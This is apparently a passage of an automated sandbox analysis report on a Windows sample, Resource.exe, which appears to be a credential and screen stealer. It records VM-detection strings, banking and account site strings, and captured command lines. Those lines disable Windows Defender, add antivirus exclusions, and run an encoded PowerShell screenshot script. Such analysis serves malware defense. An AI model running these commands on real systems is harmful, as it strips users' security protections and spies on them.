              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198458530.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000002.2205667566.0000018CAA3C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198458530.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000002.2205667566.0000018CAA3C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Resource.exe, 00000001.00000002.2472629307.0000020AB37DE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2035529511.0000020AB37E0000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2034221177.0000020AB3864000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWobje%SystemRoot%\system32\mswsock.dll
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198458530.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: Resource.exe, 00000001.00000003.2197829260.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2467713655.0000020AB4879000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2190023337.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2182338087.0000020AB482F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2243637257.0000020AB482F000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2205313641.0000020AB3EB1000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2198157815.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000003.2212166345.0000020AB3DB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmp, Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: getmac.exe, 0000004B.00000002.2205667566.0000018CAA3E2000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198373096.0000018CAA3DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198458530.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000002.2205667566.0000018CAA3C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: getmac.exe, 0000004B.00000002.2205667566.0000018CAA3E2000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2196748849.0000018CAA3B5000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004B.00000003.2198373096.0000018CAA3DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: Resource.exe, 00000001.00000002.2473004554.0000020AB39C0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicerc
              Source: Resource.exe, 00000001.00000003.2030704997.0000020AB38CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwarec
              Source: Resource.exe, 00000001.00000003.2260804855.0000020AB481E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60AC57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E60AC57C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8797B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FF8A8797B30
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60C3AF0 GetProcessHeap,0_2_00007FF6E60C3AF0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60AC760 SetUnhandledExceptionFilter,0_2_00007FF6E60AC760
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60AC57C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E60AC57C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60BABD8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6E60BABD8
              Source: C:\Users\user\Desktop\Resource.exeCode function: 0_2_00007FF6E60ABCE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6E60ABCE0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A8183058 IsProcessorFeaturePresent,00007FF8BFAB19C0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BFAB19C0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF8A8183058
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D2135 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF8A92D2135
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A92D1CBC SetUnhandledExceptionFilter,1_2_00007FF8A92D1CBC
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8A934DA5C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF8A934DA5C
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7DF4650 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF8B7DF4650
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E1D070 SetUnhandledExceptionFilter,1_2_00007FF8B7E1D070
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E12FF8 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF8B7E12FF8
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E58050 SetUnhandledExceptionFilter,IsProcessorFeaturePresent,1_2_00007FF8B7E58050
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B7E52BC0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF8B7E52BC0
              Source: C:\Users\user\Desktop\Resource.exeCode function: 1_2_00007FF8B8AFB9A0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF8B8AFB9A0
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF618624C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,103_2_00007FF618624C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61861B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,103_2_00007FF61861B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61861A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,103_2_00007FF61861A66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exeCode function: 103_2_00007FF61861B6D8 SetUnhandledExceptionFilter,103_2_00007FF61861B6D8

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\Resource.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
